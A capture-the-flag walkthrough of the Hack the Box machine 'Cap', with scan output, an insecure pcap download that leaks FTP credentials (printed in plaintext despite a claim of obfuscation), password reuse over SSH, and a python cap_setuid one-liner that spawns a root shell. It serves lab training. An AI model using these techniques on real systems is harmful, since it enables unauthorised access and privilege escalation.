Intro

Cap was a new release when I first started doing Hack the Box, and I don’t think it was very well recieved at first because of how easy it was. I’ll start by looking at (what seems to be?) an admin panel, and download some .pcap files. I’ll find that somebody’s FTP credentials were intercepted, and find that they reused their password SSH into the box. I’ll then find misconfigured linux capabilities to spawn a root shell.

Recon

n m a p s c a n

kali@kali:~/ctf/htb/cap$rustscan --ulimit 5000 10.10.10.245 -- -A -oN scans/initscan.txt .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | | | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | -' -'-----'----' -' ----' ---' -' -'-' -' Faster Nmap scanning with Rust. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 😵 https://admin.tryhackme.com [~] The config file is expected to be at "/home/kali/.config/rustscan/config.toml" [~] Automatically increasing ulimit value to 5000. Open 10.10.10.245:21 Open 10.10.10.245:22 Open 10.10.10.245:80 [~] Starting Nmap [>] The Nmap command to be run is nmap -A -oN scans/initscan.txt -vvv -p 21,22,80 10.10.10.245 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0= | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI= | 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH 80/tcp open http syn-ack gunicorn | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 NOT FOUND | Server: gunicorn | Date: Wed, 08 Sep 2021 17:21:02 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 232 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> | GetRequest: | HTTP/1.0 200 OK | Server: gunicorn | Date: Wed, 08 Sep 2021 17:20:56 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 19386 | <!DOCTYPE html> | <html class="no-js" lang="en"> | <head> | <meta charset="utf-8"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Security Dashboard</title> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico"> | <link rel="stylesheet" href="/static/css/bootstrap.min.css"> | <link rel="stylesheet" href="/static/css/font-awesome.min.css"> | <link rel="stylesheet" href="/static/css/themify-icons.css"> | <link rel="stylesheet" href="/static/css/metisMenu.css"> | <link rel="stylesheet" href="/static/css/owl.carousel.min.css"> | <link rel="stylesheet" href="/static/css/slicknav.min.css"> | <!-- amchar | HTTPOptions: | HTTP/1.0 200 OK | Server: gunicorn | Date: Wed, 08 Sep 2021 17:20:57 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Allow: HEAD, OPTIONS, GET | Content-Length: 0 | RTSPRequest: | HTTP/1.1 400 Bad Request | Connection: close | Content-Type: text/html | Content-Length: 196 | <html> | <head> | <title>Bad Request</title> | </head> | <body> | <h1><p>Bad Request</p></h1> | Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27; | </body> |_ </html> | http-methods: |_ Supported Methods: HEAD OPTIONS GET |_http-server-header: gunicorn |_http-title: Security Dashboard 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.91%I=7%D=9/8%Time=6138ECA7%P=x86_64-pc-linux-gnu%r(GetRe SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20W SF:ed,\x2008\x20Sep\x202021\x2017:20:56\x20GMT\r\nConnection:\x20close\r\n SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938 SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20 SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1 SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/ SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\ SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\ SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20 SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Wed,\x20 SF:08\x20Sep\x202021\x2017:20:57\x20GMT\r\nConnection:\x20close\r\nContent SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20HEAD,\x20OPTIONS,\x2 SF:0GET\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20 SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/ SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\ SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/ SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189, SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20We SF:d,\x2008\x20Sep\x202021\x2017:21:02\x20GMT\r\nConnection:\x20close\r\nC SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\ SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n"); Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  We see FTP, SSH, and a webserver. I checked for anonymous FTP but no luck. kali@kali:~/ctf/htb/cap$ ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:kali): anonymous
ftp>


The only thing from searchsploit for FTP was a DOS attack (which we don’t want). I went ahead and looked at the webserver as well.

Seems like we’re already signed in as a user? Looking at the other pages, we find the following pages:

• /data which has a pcap file available for download
• /ip which looks to be the output of the actual ip command in bash
• /netstat which looks to be the output of netstat

Nothing stood out as particularly interesting on the ip and netstat pages, and changing the directory name to something like whoami didn’t yield an output. I decided to focus on the /data directory.

By clicking the link that brings us to /data, we are sent to /data/1. I analyzed the pcap file using Wireshark like so.

Shell as nathan

Scrolling through this pcap file, unfortunately, doesn’t yield much. All of the captured packets are just GET requests to the website we’ve been looking at. But, recall that the URL we pulled it from was http://10.10.10.245/data/1. What if we tried to access http://10.10.10.245/data/0?

We get a different pcap file from this web page, and this one has some more useful content in it.

I guess the FTP credentials were captured while monitoring the webserver. We also see this when following the TCP stream.

220 (vsFTPd 3.0.3)
USER nathan
PASS Buck3tH4TF0RM3!
PASS Buck*********** [Obfuscated so you do the work]
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.


We can use the credentials to login to FTP.

kali@kali:~/ctf/htb/cap$ftp 10.10.10.245 Connected to 10.10.10.245. 220 (vsFTPd 3.0.3) Name (10.10.10.245:kali): nathan 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 1001 1001 4096 May 27 09:16 . drwxr-xr-x 3 0 0 4096 May 23 19:17 .. lrwxrwxrwx 1 0 0 9 May 15 21:40 .bash_history -> /dev/null -rw-r--r-- 1 1001 1001 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 1001 1001 3771 Feb 25 2020 .bashrc drwx------ 2 1001 1001 4096 May 23 19:17 .cache -rw-r--r-- 1 1001 1001 807 Feb 25 2020 .profile lrwxrwxrwx 1 0 0 9 May 27 09:16 .viminfo -> /dev/null -r-------- 1 1001 1001 33 Sep 08 13:04 user.txt 226 Directory send OK. ftp>  It appears we are in nathan’s home directory, and we can grab the user flag. ftp> get user.txt local: user.txt remote: user.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for user.txt (33 bytes). 226 Transfer complete. 33 bytes received in 0.00 secs (304.0242 kB/s) kali@kali:~/ctf/htb/cap$ cat user.txt
3fd333ec************************


I’m also willing to bet that the FTP password is the same as the SSH password.

kali@kali:~/ctf/htb/cap$ssh nathan@10.10.10.245 nathan@10.10.10.245's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) Last login: Thu May 27 11:21:27 2021 from 10.10.14.7 nathan@cap:~$


Yep. It’s an easy box alright.

Shell as root

Some initial poking around shows that we can’t run anything with sudo. I ran linpeas.sh to get a quick layout of the system and the following sticks out at me.

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. cp $(which python) . sudo setcap cap_setuid+ep python ./python -c ‘import os; os.setuid(0); os.system(“/bin/sh”)’ Note in post: I just realized the name “Cap” refers to both foothold and escalation here which is, in fact, funny And with that, we run the following to get root. nathan@cap:/dev/shm$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'